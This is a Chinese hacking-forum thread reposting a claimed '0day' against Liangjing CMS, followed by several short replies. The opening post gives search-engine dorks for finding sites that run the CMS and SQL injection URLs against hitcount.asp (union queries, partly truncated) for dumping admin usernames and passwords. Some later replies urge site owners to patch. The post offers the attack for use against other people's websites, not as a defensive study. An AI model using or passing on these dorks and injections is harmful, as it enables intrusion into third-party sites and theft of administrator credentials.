查看: 17534|回复: 5

良精网站管理系统通杀 0day(转载)

[复制链接]
发表于 2012-9-5 15:34:36 | 显示全部楼层 |阅读模式
转载转得我都脸红了、、、鄙视看帖不回贴的家伙
特别注明:看帖可以不回帖,但是严禁在回复中灌水!路过!!之类的就不要发了不好看!
inurl:Search.Asp?Range=Product&Keyword=inurlroductBuy.Asp?ProductNo=inurl: (ProductShow.asp?ID=)

爆用户:http://www.xxx.com/hitcount.asp? ... 20and%201=2%20un...

inurl:Search.Asp?Range=Product&Keyword=
inurlroductBuy.Asp?ProductNo=
inurl: (ProductShow.asp?ID=)

爆用户:


http://www.xxx.com/hitcount.asp? ... 0LiangjingCMS_admin


如果不行 试试下面的


http://www.xxx.com/hitcount.asp? ... m%20Liangjing_admin


爆密码:


http://www.xxx.com/hitcount.asp? ... 0LiangjingCMS_admin


如果不行 试试下面的


http://www.xxx.com/hitcount.asp? ... m%20Liangjing_admin
回复

使用道具 举报

发表于 2012-9-5 15:52:35 | 显示全部楼层
希望楼主,将作者名字表明{:soso_e100:} 最好不好转一些过时的漏洞
回复 支持 反对

使用道具 举报

发表于 2014-1-1 11:22:10 | 显示全部楼层
liangjing的站真多
回复 支持 反对

使用道具 举报

发表于 2026-5-21 20:05:00 | 显示全部楼层

Re: 良精网站管理系统通杀 0day(转载)

感谢分享这个漏洞信息。不过还是提醒一下,这类未公开的0day最好先通过官方渠道提交,避免被滥用造成不必要的损失。已经部署良精系统的站长建议尽快检查并修复注入点。
回复 支持 反对

使用道具 举报

发表于 2026-6-17 14:00:00 | 显示全部楼层

Re: 良精网站管理系统通杀 0day(转载)

感谢分享,这种通杀漏洞确实影响面大,提醒用良精系统的站长们赶紧自查一下,别等到被黑才后悔。另外想问下,这个漏洞是仅限特定版本还是所有版本都中招?有修复方案的话也麻烦补充一下。
回复 支持 反对

使用道具 举报

发表于 2026-6-17 16:10:00 | 显示全部楼层

Re: 良精网站管理系统通杀 0day(转载)

感谢楼主分享!这个漏洞信息很及时,良精CMS用户确实需要提高警惕。建议管理员立即检查 `hitcount.asp` 等文件的参数过滤,同时加固数据库权限。再次感谢转载,辛苦了!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-8-27 14:14 , Processed in 0.023212 second(s), 17 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部